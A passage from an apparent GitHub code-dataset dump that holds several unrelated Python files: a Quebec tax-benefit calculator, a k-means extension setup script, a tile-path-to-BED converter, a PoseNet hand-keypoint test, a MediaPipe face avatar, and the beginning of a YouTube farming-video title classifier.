fam_disp_inc_max:\n fam_disp_inc_max, transfer_max = hh.fam_disp_inc, transfer\n\n if transfer != transfer_max:\n self.compute_with_transfer(hh, transfer_max)\n return hh\n\n def compute_with_transfer(self, hh, transfer):\n \"\"\"\n Cette fonction effectue les transferts de revenus de pension et appelle\n la fonction qui simule le ménage.\n\n Parameters\n ----------\n hh: Hold\n instance de la classe Hhold\n transfer: float\n transfert du premier au second conjoint (du second au premier si négatif)\n \"\"\"\n hh.reset()\n p0, p1 = hh.sp[0], hh.sp[1]\n if transfer < 0:\n p0.pension_split = - transfer\n p1.pension_deduction = - transfer\n if p1.age >= 65:\n p0.pension_split_qc = p0.pension_split\n p1.pension_deduction_qc = p1.pension_deduction\n else:\n p1.pension_split = transfer\n p0.pension_deduction = transfer\n if p0.age >= 65:\n p1.pension_split_qc = p1.pension_split\n p0.pension_deduction_qc = p0.pension_deduction\n\n self.compute_all(hh)\n\n def compute_all(self, hh):\n \"\"\"\n Calcule tous les éléments demandés.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n if self.ipayroll:\n self.compute_payroll(hh) # put payroll before oas \n if self.year == 2020 or self.year == 2021:\n self.compute_covid(hh)\n self.compute_ei(hh)\n if self.ioas:\n self.compute_oas(hh)\n if self.ifed:\n self.compute_fed(hh)\n if self.iprov:\n self.compute_prov(hh)\n if self.iass:\n self.compute_sa(hh)\n self.disp_inc(hh)\n\n def compute_oas(self, hh):\n \"\"\"\n Calcul des prestations de PSV, SRG, Allocation et Allocation au survivant.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n self.oas.file(hh)\n\n def compute_fed(self, hh):\n \"\"\"\n Calcul de l'impôt fédéral.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n self.federal.file(hh)\n\n def compute_prov(self, hh):\n \"\"\"\n Calcul de l'impôt provincial.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n self.prov[hh.prov].file(hh)\n\n\n def compute_payroll(self, hh):\n \"\"\"\n Calcul des cotisations sociales.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n self.payroll.compute(hh)\n\n def compute_covid(self, hh):\n \"\"\"\n Calcul de la PCU, de la PCRE, de la PCUE et du PIRTE.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n self.covid.compute(hh)\n\n def compute_ei(self, hh):\n \"\"\"\n Calcul des prestations de l'assurance emploi qui remplaceraient la PCU (contrefactuel).\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n for p in hh.sp:\n self.ei.compute_benefits_covid(p, hh)\n\n def compute_sa(self, hh):\n \"\"\"\n Calcul des prestations d'aide sociale.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n self.ass.file(hh)\n\n\n def compute_after_tax_inc(self, hh):\n \"\"\"\n Calcul du revenu après impôt fédéral et provincial.\n\n Calcul fait au niveau individuel et ensuite rattaché à la personne; le résultat au niveau du ménage est aussi disponible.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n for p in hh.sp:\n after_tax_inc = p.inc_tot\n if self.ifed:\n after_tax_inc -= p.fed_return['net_tax_liability']\n if self.iprov:\n after_tax_inc -= p.prov_return['net_tax_liability']\n p.after_tax_inc = after_tax_inc\n\n def disp_inc(self, hh):\n \"\"\"\n Calcul du revenu disponible après impôts, cotisations sociales, épargne (positive ou négative) et prestations.\n\n Calcul fait au niveau individuel et ensuite rattaché à la personne; le résultat au niveau du ménage est aussi disponible.\n\n Parameters\n ----------\n hh: Hhold\n instance de la classe Hhold\n \"\"\"\n self.compute_after_tax_inc(hh)\n for p in hh.sp:\n disp_inc = p.after_tax_inc\n if self.ipayroll:\n disp_inc -= sum(list(p.payroll.values()))\n if self.iass:\n disp_inc += p.inc_sa\n disp_inc -= p.con_rrsp + p.con_non_rrsp\n p.disp_inc = disp_inc\n\n\nclass incentives:\n def __init__(self, case_mode=True, year=2020, data_file=None,\n multiprocessing=True):\n self.case_mode = case_mode\n self.year = year\n self.set_wages()\n self.set_cases()\n if case_mode:\n self.init_hh()\n else:\n self.load_hh(data_file)\n self.set_hours()\n self.set_covid()\n self.set_tax_system()\n self.multiprocessing = multiprocessing\n\n def set_cases(self, icouple=True, isp_work=True, ikids=True,\n iessential=True, insch=True, wages=np.linspace(1, 5, 10)):\n self.icouple = icouple\n self.isp_work = isp_work\n self.ikids = ikids\n self.iessential = iessential\n self.insch = insch\n self.wages = wages\n l_index = []\n if self.icouple:\n l_index.append(['single', 'couple'])\n if self.isp_work:\n l_index.append([True, False])\n else:\n l_index.append([False])\n else:\n # for couple\n l_index.append(['single'])\n # for sp_work\n l_index.append([False])\n if self.ikids:\n l_index.append([0,1,2])\n else:\n l_index.append([0])\n if self.iessential:\n l_index.append([True,False])\n else:\n l_index.append([False])\n if self.insch:\n l_index.append([True,False])\n else:\n l_index.append([False])\n l_index.append(wages)\n cases = list(product(*l_index))\n cases = pd.DataFrame(index=pd.MultiIndex.from_tuples(cases))\n cases.index.names = ['couple', 'sp_work', 'nkids', 'essential',\n 'student', 'wage_multiple']\n to_drop = (cases.index.get_level_values(0)=='single') & (cases.index.get_level_values('sp_work')==True)\n cases = cases.loc[to_drop==False, :]\n self.cases = cases\n\n def set_hours(self, nh=51, maxh=50, dh=10, weeks_per_year=52.1,\n hours_full=40):\n self.nh = nh\n self.maxh = maxh\n self.gridh = np.linspace(0,self.maxh, self.nh)\n self.dh = dh\n self.weeks_per_year = weeks_per_year\n self.hours_full = hours_full\n\n def set_covid(self, months_pre=3, months_covid=4):\n self.months_pre = months_pre\n self.months_covid = months_covid\n self.months_post = 12 - months_pre - months_covid\n self.share_covid = months_covid * 4 / self.weeks_per_year\n self.share_pre = self.months_pre * 4 / self.weeks_per_year\n self.share_post = self.months_post * 4 / self.weeks_per_year\n\n def set_wages(self,minwage=13.1, avgwage=25.0):\n self.minwage = minwage\n self.avgwage = avgwage\n\n def set_tax_system(self, tax_system=None):\n if tax_system is not None:\n self.tax_system = tax_system\n else :\n self.tax_system = tax(self.year,iass=False)\n\n def init_hh(self):\n self.cases['hhold'] = None\n for i in self.cases.index:\n p = Person(age=45, essential_worker=i[3], student=i[4])\n hh = Hhold(p, prov='qc')\n if i[0] == 'couple':\n if i[1]:\n sp_earn = self.avgwage * self.hours_full * 52.1\n else:\n sp_earn = 0.0\n sp = Person(age=45,earn=sp_earn)\n hh.sp.append(sp)\n if i[2] > 0:\n for k in range(i[2]):\n d = Dependent(age=3)\n hh.dep.append(d)\n self.cases.loc[i,'hhold'] = hh\n\n def load_hh(self, file):\n if isinstance(file, pd.DataFrame):\n self.cases = file\n else:\n self.cases = pd.read_pickle(file)\n self.cases['couple'] = np.where(self.cases['couple'],'couple','single')\n self.cases['sp_work'] = self.cases['s_inc_earn'] > 0\n self.cases['nkids'] = np.where(self.cases['n_kids']>2,2,self.cases['n_kids'])\n self.cases['essential'] = self.cases['r_essential_worker']\n self.cases['student'] = self.cases['r_student']\n self.cases['wage_multiple'] = self.cases['r_wage']/self.minwage\n self.cases['r_hours_worked_week'] = self.cases['r_hours_worked'] / 50\n self.cases['s_hours_worked_week'] = self.cases['s_hours_worked'] / 50\n self.cases = self.cases.set_index(['couple', 'sp_work', 'nkids',\n 'essential', 'student',\n 'wage_multiple'])\n\n def map_dispinc(self, row):\n \"\"\"\n Map les attributs aux ménages\n \"\"\"\n hours_pre = [row['hours_pre'] / self.months_pre] * self.months_pre\n hours_covid = [row['hours_covid'] / self.months_covid] * self.months_covid\n earn_pre = [row['earn_pre'] / self.months_pre] * self.months_pre\n earn_covid = [row['earn_covid'] / self.months_covid] * self.months_covid\n if self.months_post > 0:\n hours_post = [row['hours_post'] / self.months_post] * self.months_post\n earn_post = [row['earn_post'] / self.months_post] * self.months_post\n row['hhold'].sp[0].hours_month = hours_pre + hours_covid + hours_post\n row['hhold'].sp[0].inc_earn = earn_pre + earn_covid + earn_post\n row['hhold'].sp[0].inc_self_earn = earn_pre + earn_covid + earn_post\n else:\n row['hhold'].sp[0].inc_earn = earn_pre + earn_covid\n row['hhold'].sp[0].attach_inc_work_month(row['hhold'].sp[0].inc_earn,\n [0] * 12) # hourly wage based on earn and self_earn mapped into inc_earn\n if row['hhold'].sp[0].student:\n row['hhold'].sp[0].months_cesb = self.months_covid\n else:\n row['hhold'].sp[0].months_cerb = self.months_covid\n self.tax_system.compute(row['hhold'])\n self.tax_system.disp_inc(row['hhold'])\n return row['hhold'].fam_disp_inc\n\n def set_track_fed(self, attributes=[]):\n \"\"\" Fonction qui permet de sortir des éléments du rapport d'impôt fédéral\n\n Keyword Arguments:\n attributes {list} -- liste des attributs (default: {[]})\n \"\"\"\n self.fed_track = attributes\n\n def set_track_prov(self, attributes=[]):\n \"\"\" Fonction qu permet de sortir des éléments du rapport d'impôt du Québec\n\n Keyword Arguments:\n attributes {list} -- liste des attributs (default: {[]})\n \"\"\"\n self.prov_track = attributes\n\n def map_chunk(self, df):\n return df.apply(self.map_dispinc,axis=1)\n\n def get_dispinc(self,h,ifed=False,iprov=False):\n results = self.cases.copy()\n results['wage'] = self.minwage * np.array(results.index.get_level_values('wage_multiple'))\n if self.case_mode:\n results['hours_pre'] = self.hours_full * self.weeks_per_year * self.share_pre\n results['hours_post'] = self.hours_full * self.weeks_per_year * self.share_pre\n else:\n results['hours_pre'] = results['r_hours_worked_week'] * self.weeks_per_year * self.share_pre\n results['hours_post'] = results['r_hours_worked_week'] *self.weeks_per_year * self.share_post\n results['earn_pre'] = results['hours_pre'] * results['wage']\n results['earn_post'] = results['hours_post'] * results['wage']\n results['hours_covid'] = h * self.weeks_per_year * self.share_covid\n results['earn_covid'] = results['hours_covid'] * results['wage']\n results['earn'] = results['earn_pre'] + results['earn_covid'] + results['earn_post']\n if self.multiprocessing:\n nchunks = cpu_count()\n chunks = np.array_split(results,nchunks)\n p = Pool(nchunks)\n results['dispinc'] = pd.concat(p.map(self.map_chunk,chunks))\n p.close()\n p.join()\n else:\n results['dispinc'] = results.apply(self.map_dispinc, axis=1)\n if ifed:\n for attr in self.fed_track:\n results['fed_'+attr] = [hh.sp[0].fed_return[attr] for hh in results['hhold']]\n if iprov:\n for attr in self.prov_track:\n results['prov_'+attr] = [hh.sp[0].prov_return[attr] for hh in results['hhold']]\n return results\n\n def get_one_emtr(self, h):\n work_base = self.get_dispinc(h)\n work_more = self.get_dispinc(h+self.dh)\n temi = 1.0 - (work_more['dispinc'] - work_base['dispinc'])/(work_more['earn'] - work_base['earn'])\n return temi\n\n def get_one_ptr(self, h):\n work_base = self.get_dispinc(0)\n work_more = self.get_dispinc(h)\n tepi = 1.0 - (work_more['dispinc'] - work_base['dispinc'])/(work_more['earn'] - work_base['earn'])\n return tepi\n\n def emtr(self):\n results = self.cases.copy()\n for h in self.gridh:\n results['temi_'+str(int(h))] = self.get_one_emtr(h)\n return results\n\n def ptr(self):\n results = self.cases.copy()\n for h in self.gridh[1:]:\n results['tepi_'+str(int(h))] = self.get_one_ptr(h)\n return results\n\n def dispinc(self):\n results = self.cases.copy()\n for h in self.gridh:\n res = self.get_dispinc(h)\n results['dispinc_'+str(int(h))] = res['dispinc']\n return results\n\n def compute_emtr_ptr_dispinc(self):\n for h in self.gridh:\n self.cases['temi_'+str(int(h))] = self.get_one_emtr(h)\n for h in self.gridh[1:]:\n self.cases['tepi_'+str(int(h))] = self.get_one_ptr(h)\n for h in self.gridh:\n res = self.get_dispinc(h)\n self.cases['dispinc_'+str(int(h))] = res['dispinc']\n","repo_name":"CREEi-models/srd","sub_path":"srd/calculators.py","file_name":"calculators.py","file_ext":"py","file_size_in_byte":18159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"33437814308","text":"from distutils.core import setup, Extension\nimport numpy\n\npykmeans = Extension(\n 'pykmeans',\n sources=['pykmeans.c'],\n library_dirs=['/mnt/software/intel/composer_xe_2013.4.183/mkl/lib/intel64'],\n libraries=['mkl_rt', 'mkl_intel_ilp64', 'mkl_gnu_thread', 'mkl_core', 'dl', 'pthread', 'm', 'gomp'],\n extra_compile_args=['-fopenmp', '-g', '-DMKL_ILP64', '-m64', '-O3'],\n include_dirs=[numpy.get_include(), '.', '/mnt/software/intel/composer_xe_2013.4.183/mkl/include'],\n)\n\nsetup(\n name='pykmeans',\n version='0.1',\n description='A fast and simple main-memory kmeans implementation using OpenMP and blas.',\n ext_modules=[pykmeans],\n)\n","repo_name":"danielhauagge/pykmeans","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74499305362","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport collections\nimport subprocess\nimport os\nimport argparse\nimport re\n\nPathInfo = collections.namedtuple(\"PathInfo\", [\"chrom\", \"firstend\", \"lastend\"])\n\ndef get_pathinfo(path, assembly, assemblyindextext):\n \"\"\"Geth PathInfo of a path from the assembly\"\"\"\n pattern = r'.*:{}\\t.*'.format(path)\n match = re.search(pattern, assemblyindextext)\n if match:\n indexline = match.group()\n else:\n raise Exception(\"No such path as {}\".format(path))\n fields = indexline.split('\\t')\n chrom = fields[0].split(':')[1]\n length = fields[1]\n offset = fields[2]\n pathassembly = subprocess.check_output([\"bgzip\", \"-b\", offset, \"-s\", length, assembly]).strip()\n assemblylines = pathassembly.split('\\n')\n firstend = int(assemblylines[0].split('\\t')[1])\n lastend = int(assemblylines[-1].split('\\t')[1])\n return PathInfo(chrom, firstend, lastend)\n\ndef make_bed_path(path, assembly):\n \"\"\"Make the bed file of a path\"\"\"\n assemblyindex = os.path.splitext(assembly)[0] + \".fwi\"\n with open(assemblyindex) as f:\n assemblyindextext = f.read()\n pathinfo = get_pathinfo(path, assembly, assemblyindextext)\n if path == \"0000\":\n start = 0\n else:\n previous_path = format(int(path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n while (previous_pathinfo.lastend >= pathinfo.firstend and previous_pathinfo.chrom == pathinfo.chrom):\n previous_path = format(int(previous_path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n else:\n if previous_pathinfo.chrom != pathinfo.chrom:\n start = 0\n else:\n start = previous_pathinfo.lastend\n print(\"{}\\t{}\\t{}\".format(pathinfo.chrom, start, pathinfo.lastend))\n\ndef make_bed_steps(path, stepsfile, assembly):\n \"\"\"Make the bed file of a list of steps in a path\"\"\"\n assemblyindex = os.path.splitext(assembly)[0] + \".fwi\"\n with open(assemblyindex) as f:\n assemblyindextext = f.read()\n pattern = r'.*:{}\\t.*'.format(path)\n match = re.search(pattern, assemblyindextext)\n if match:\n indexline = match.group()\n else:\n raise Exception(\"No such path as {}\".format(path))\n fields = indexline.split('\\t')\n chrom = fields[0].split(':')[1]\n length = fields[1]\n offset = fields[2]\n pathassembly = subprocess.check_output([\"bgzip\", \"-b\", offset, \"-s\", length, assembly]).strip()\n assemblylines = pathassembly.split('\\n')\n\n with open(stepsfile) as f:\n for line in f:\n linestrip = line.strip()\n step = linestrip.split('+')[0]\n span = int(linestrip.split('+')[1], 16)\n spanningtile_step = format(int(step, 16) + span - 1, '04x')\n pattern = re.compile(r'^{}\\t.*'.format(spanningtile_step), re.MULTILINE)\n match = re.search(pattern, pathassembly)\n if match:\n end = int(match.group().split('\\t')[1].strip())\n else:\n raise Exception(\"No such step as {} with span {} in path {}\".format(step, span, path))\n\n # calculate previous tile to derive start position\n # calculate previous tile when the step is not the first one in the path\n if step != \"0000\":\n previous_step = format(int(step, 16) - 1, '04x')\n previous_pattern = re.compile(r'^{}\\t.*'.format(previous_step), re.MULTILINE)\n previous_match = re.search(previous_pattern, pathassembly)\n start = int(previous_match.group().split('\\t')[1].strip())\n elif path == \"0000\":\n start = 0\n # calculate previous tile when the step is the first one in the path\n else:\n previous_path = format(int(path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n while (previous_pathinfo.lastend >= end and previous_pathinfo.chrom == chrom):\n previous_path = format(int(previous_path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n else:\n if previous_pathinfo.chrom != chrom:\n start = 0\n else:\n start = previous_pathinfo.lastend\n print(\"{}\\t{}\\t{}\".format(chrom, start, end))\n\ndef main():\n parser = argparse.ArgumentParser(description='Output the bed file\\\n of a path, or a sub-region of a path.')\n parser.add_argument('path', metavar='PATH', help='tile path')\n parser.add_argument('assembly', metavar='ASSEMBLY', help='assembly file')\n\n parser.add_argument('--stepsfile', help='steps file indicating a sub-region\\\n of a path, each line in the form of \"step+span\"')\n\n args = parser.parse_args()\n if args.stepsfile:\n make_bed_steps(args.path, args.stepsfile, args.assembly)\n else:\n make_bed_path(args.path, args.assembly)\n\nif __name__ == '__main__':\n main()\n","repo_name":"arvados/l7g","sub_path":"tools/cgf2vcf/steps2bed.py","file_name":"steps2bed.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"36223301321","text":"#\n# Test for PoseNet\n#\n\nfrom __future__ import print_function, unicode_literals\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.misc\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom nets.network import PoseEstimationNetwork\nfrom utils.general import *\n\n# snapshots file path\nPATH_TO_HANDSEGNET_SNAPSHOTS = './snapshots_handsegnet/' \nPATH_TO_POSENET_SNAPSHOTS = './snapshots_posenet/' \n\nif __name__ == '__main__':\n # images to be shown\n image_list = list()\n image_list.append('./data/6.png')\n image_list.append('./data/2.png')\n image_list.append('./data/3.png')\n image_list.append('./data/4.png')\n image_list.append('./data/5.png')\n\n # network input\n image_tf = tf.placeholder(tf.float32, shape=(1, 240, 320, 3))\n\n # build network\n net = PoseEstimationNetwork()\n hand_scoremap_tf, image_crop_tf, scale_crop_tf, center_tf = net.HandSegCrop(image_tf)\n \n # detect keypoints in 2D\n s = image_crop_tf.get_shape().as_list()\n keypoints_scoremap_tf = net.PoseNet(image_crop_tf)\n keypoints_scoremap_tf = keypoints_scoremap_tf[-1]\n keypoints_scoremap_tf = tf.image.resize_images(keypoints_scoremap_tf, (s[1], s[2]))\n\n # Start TF\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.8)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n # Load CheckPoint files \n last_cpt = tf.train.latest_checkpoint(PATH_TO_HANDSEGNET_SNAPSHOTS)\n assert last_cpt is not None, \"Could not locate snapshot to load. Did you already train the network and set the path accordingly?\"\n load_weights_from_snapshot(sess, last_cpt, discard_list=['Adam', 'global_step', 'beta'])\n\n last_cpt = tf.train.latest_checkpoint(PATH_TO_POSENET_SNAPSHOTS)\n assert last_cpt is not None, \"Could not locate snapshot to load. Did you already train the network and set the path accordingly?\"\n load_weights_from_snapshot(sess, last_cpt, discard_list=['Adam', 'global_step', 'beta'])\n\n # OR load weights used in the paper\n # net.init(sess, weight_files=['./weights/handsegnet-rhd.pickle',\n # './weights/posenet-rhd-stb.pickle'], exclude_var_list=['PosePrior', 'ViewpointNet'])\n\n \n # Feed image list through network\n for img_name in image_list:\n image_raw = scipy.misc.imread(img_name)\n image_raw = scipy.misc.imresize(image_raw, (240, 320))\n image_v = np.expand_dims((image_raw.astype('float') / 255.0) - 0.5, 0)\n\n hand_scoremap_v, image_crop_v, scale_v, center_v,\\\n keypoints_scoremap_v = sess.run([hand_scoremap_tf, image_crop_tf, scale_crop_tf, center_tf,keypoints_scoremap_tf],\n feed_dict={image_tf: image_v})\n \n hand_scoremap_v = np.squeeze(hand_scoremap_v)\n image_crop_v = np.squeeze(image_crop_v)\n keypoints_scoremap_v = np.squeeze(keypoints_scoremap_v)\n\n # post processing\n image_crop_v = ((image_crop_v + 0.5) * 255).astype('uint8')\n coord_hw_crop = detect_keypoints(np.squeeze(keypoints_scoremap_v))\n coord_hw = trafo_coords(coord_hw_crop, center_v, scale_v, 256)\n\n # visualize\n fig = plt.figure(1)\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax1.imshow(image_raw)\n plot_hand(coord_hw, ax1)\n ax2.imshow(image_crop_v)\n plot_hand(coord_hw_crop, ax2)\n ax3.imshow(np.argmax(hand_scoremap_v, 2))\n plt.show()\n","repo_name":"Julia0524/Image-Processing-Project","sub_path":"test_posenet.py","file_name":"test_posenet.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72895123922","text":"import mediapipe as mp\nimport cv2\nimport numpy as np\nfrom tkinter import Tk, Canvas, PhotoImage, NW, Button\nfrom PIL import Image, ImageTk\nfrom ctypes import windll\n\n#loomie\n#cap = cv2.VideoCapture(0)\n#cap = cv2.VideoCapture(3) # caso demore para abrir sua camera, teste esse\ncap = cv2.VideoCapture(3, cv2.CAP_DSHOW) # caso demore para abrir sua camera, teste esse\n\nface_mesh = mp.solutions.face_mesh\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ndef achar_pontos(pontos_da_parte):\n parte = []\n for point in pontos_da_parte:\n ponto_percentual = face_landmarks.landmark[point]\n y, x, z = frame.shape\n\n ponto_x = int(x * ponto_percentual.x)\n ponto_y = int(y * ponto_percentual.y)\n\n parte.append([ponto_x, ponto_y])\n return parte\n\nface = face_mesh.FaceMesh(static_image_mode=True,\n max_num_faces=1,\n refine_landmarks=True,\n min_detection_confidence=0.5)\n\nif not cap.isOpened():\n print(\"nao abriu\")\n exit()\n\n## opcional: codigo para tirar a barra sem remover o icone\nGWL_EXSTYLE=-20\nWS_EX_APPWINDOW=0x00040000\nWS_EX_TOOLWINDOW=0x00000080\n\ndef set_appwindow(root):\n hwnd = windll.user32.GetParent(root.winfo_id())\n style = windll.user32.GetWindowLongW(hwnd, GWL_EXSTYLE)\n style = style & ~WS_EX_TOOLWINDOW\n style = style | WS_EX_APPWINDOW\n windll.user32.SetWindowLongW(hwnd, GWL_EXSTYLE, style)\n root.wm_withdraw()\n root.after(3000, lambda: root.wm_deiconify())\n\nrodando = True\n\ndef desligar(event):\n global rodando\n rodando = False\n\nlastClickX = 0\nlastClickY = 0\ndef SaveLastClickPos(event):\n global lastClickX, lastClickY\n lastClickX = event.x\n lastClickY = event.y\n\n\ndef Dragging(event):\n x, y = event.x - lastClickX + root.winfo_x(), event.y - lastClickY + root.winfo_y()\n root.geometry(\"+%s+%s\" % (x , y))\n\nroot = Tk()\nroot.title('Jarvis')\nroot.attributes('-transparentcolor','#f0f0f0')\ncanvas = Canvas(root, width=800, height=600)\ncanvas.pack()\n\nsem_borda = True\nif sem_borda:\n root.overrideredirect(True) # remove a barra\n root.after(500, lambda: set_appwindow(root))\n\nroot.bind('', SaveLastClickPos)\nroot.bind('', Dragging)\nroot.bind(\"\", desligar)\n\nimage_init = np.zeros((800, 600, 3), np.uint8)\nimage_init_tk = ImageTk.PhotoImage(image=Image.fromarray(image_init))\npose_container = canvas.create_image(0, 0, anchor=NW, image=image_init_tk)\n\nwindowName = \"Imagem Mil Grau\"\n\nwhile rodando:\n ret, frame = cap.read()\n\n if not ret:\n print(\"nao tem frame\")\n break\n\n frame_shape = frame.shape\n image = np.zeros((frame_shape[0], frame_shape[1], 3), np.uint8)\n\n results = face.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n if results.multi_face_landmarks:\n for face_landmarks in results.multi_face_landmarks:\n mouth_points_1 = [61, 146, 91, 181, 84, 17, 314, 405, 321, 375, 291] # labio baixo\n mouth_points_2 = [61, 185, 40, 39, 37, 0, 267, 269, 270, 409, 291] # labio cima\n mouth_points_3 = [78, 95, 88, 178, 87, 14, 317, 402, 318, 324, 308] # labio interno baixo\n mouth_points_4 = [78, 191, 80, 81, 82, 13, 312, 311, 310, 415, 308] # labio interno cima\n\n iris_left = [474, 475, 476, 477]\n iris_right = [469, 470, 471, 472]\n\n nose_points_1 = [168, 6, 197, 195, 5, 4, 1, 19, 94, 2]\n nose_points_2 = [98, 97, 2, 326, 327, 294, 278, 344, 440, 275, 4, 45, 220, 115, 48, 64, 98]\n\n face_oval_points = [10, 338, 297, 332, 284, 251, 389, 356, 454, 323, 361, 288,\n 397, 365, 379, 378, 400, 377, 152, 148, 176, 149,\n 150, 136, 172, 58, 132, 93, 234, 127, 162, 21, 54,\n 103, 67, 109, 10]\n\n boca_points = mouth_points_1 + mouth_points_2[::-1]\n boca_points_up = mouth_points_2 + mouth_points_4[::-1]\n boca_points_down = mouth_points_1 + mouth_points_3[::-1]\n iris_points_left = iris_left\n\n boca = achar_pontos(boca_points)\n boca_u = achar_pontos(boca_points_up)\n boca_d = achar_pontos(boca_points_down)\n iris_l = achar_pontos(iris_left)\n iris_r = achar_pontos(iris_right)\n nose1 = achar_pontos(nose_points_1)\n nose2 = achar_pontos(nose_points_2)\n face_oval = achar_pontos(face_oval_points)\n\n for point in boca_points:\n ponto_percentual = face_landmarks.landmark[point]\n y, x, z = frame.shape\n\n ponto_x = int(x * ponto_percentual.x)\n ponto_y = int(y * ponto_percentual.y)\n\n #boca.append([ponto_x, ponto_y])\n\n frame = cv2.circle(frame, (ponto_x, ponto_y), 1, (255, 0, 0), 3)\n\n # desenhar rosto todo\n rosto_todo = True\n if rosto_todo:\n\n mp_drawing.draw_landmarks(\n image=frame,\n landmark_list=face_landmarks,\n connections= face_mesh.FACEMESH_TESSELATION,\n connection_drawing_spec=mp_drawing_styles.get_default_face_mesh_tesselation_style(),\n landmark_drawing_spec=None)\n\n mp_drawing.draw_landmarks(\n image=frame,\n landmark_list=face_landmarks,\n connections=face_mesh.FACEMESH_CONTOURS,\n connection_drawing_spec=mp_drawing_styles.get_default_face_mesh_contours_style(),\n landmark_drawing_spec=None)\n\n cv2.fillPoly(image, pts=np.array([face_oval]), color=(255, 255, 255))\n cv2.fillPoly(image, pts=np.array([boca]), color=(255, 0, 0))\n cv2.fillPoly(image, pts=np.array([boca_d]), color=(0, 255, 0))\n cv2.fillPoly(image, pts=np.array([boca_u]), color=(0, 255, 0))\n cv2.fillPoly(image, pts=np.array([iris_l]), color=(255, 255, 0))\n cv2.fillPoly(image, pts=np.array([iris_r]), color=(255, 255, 0))\n cv2.fillPoly(image, pts=np.array([nose1]), color=(0, 0, 255)) # BGR\n cv2.fillPoly(image, pts=np.array([nose2]), color=(0, 0, 255))\n\n # transparencia\n tmp = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n _, alpha = cv2.threshold(tmp, 0, 125, cv2.THRESH_BINARY)\n b, g, r = cv2.split(image)\n image_transparency = cv2.merge([b,g,r, alpha], 4)\n image_transparency_tk = ImageTk.PhotoImage(image=Image.fromarray(image_transparency))\n canvas.itemconfig(pose_container, image=image_transparency_tk)\n root.update()\n\n aumento = 1.4\n image = cv2.resize(image, (int(frame_shape[1] * aumento), int(frame_shape[0] * aumento)))\n\ncv2.destroyAllWindows()\ncap.release()\nprint(\"Encerrou\")\n","repo_name":"inteligenciamilgrau/avatar_mediapipe","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30990167166","text":"import csv\nimport urllib.request\nimport string\nfrom googleapiclient.discovery import build\nimport sqlite3\nimport pickle\nimport pandas as pd\nimport sklearn\nfrom nltk.corpus import stopwords\nimport re\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.model_selection import train_test_split\n\n# Get API key\nAPI_KEY = 'Add your YouTube API key here'\n\n# Build YouTube variable\nyoutube = build('youtube', 'v3', developerKey=API_KEY)\n\n# Create connection to video database\nconn = sqlite3.connect('farming_video.db')\nprint('Database Opened Successfully')\n\n\n# Removes punctuation and special characters\ndef clean_text(df, text_field, new_text_field_name):\n df[new_text_field_name] = df[text_field].str.lower()\n df[new_text_field_name] = df[new_text_field_name].apply(\n lambda elem: re.sub(r\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)|^rt|http.+?\", \"\", elem))\n # remove numbers\n df[new_text_field_name] = df[new_text_field_name].apply(lambda elem: re.sub(r\"\\d+\", \"\", elem))\n\n return df\n\n\npd.set_option('display.max_colwidth', -1)\n# nltk.download('stopwords')\n\nstop = stopwords.words('english')\n# Reads in the data\nfile_name = 'video_dataset (2).csv'\ntrain_data = pd.read_csv(file_name)\n# Drops all columns text and target\ncols_to_drop = ['video_url_id']\ntrain_data = train_data.drop(cols_to_drop, axis=1)\n\ndata_clean = clean_text(train_data, 'video_title', 'video_title')\n# Removes stop words\ndata_clean['video_title'] = data_clean['video_title'].apply(\n lambda x: ' '.join([word for word in x.split() if word not in stop]))\n\nX_train, X_test, y_train, y_test = train_test_split(data_clean['video_title'], data_clean['label'], random_state=0)\n\nvectorizer = TfidfVectorizer(min_df=10)\nX_train = vectorizer.fit_transform(X_train)\nX_test = vectorizer.transform(X_test)\n\nfilename = 'trained_model.sav'\nloaded_model = pickle.load(open(filename, 'rb'))\n\n\n# returns a string that can be used in a youtube search\ndef prepare_search_term(search_keyword):\n search_term = search_keyword\n # Clean the text\n\n # Punctuations\n punct = set(string.punctuation)\n punct.add('✔')\n search_term = \"\".join([ch for ch in search_term if ch 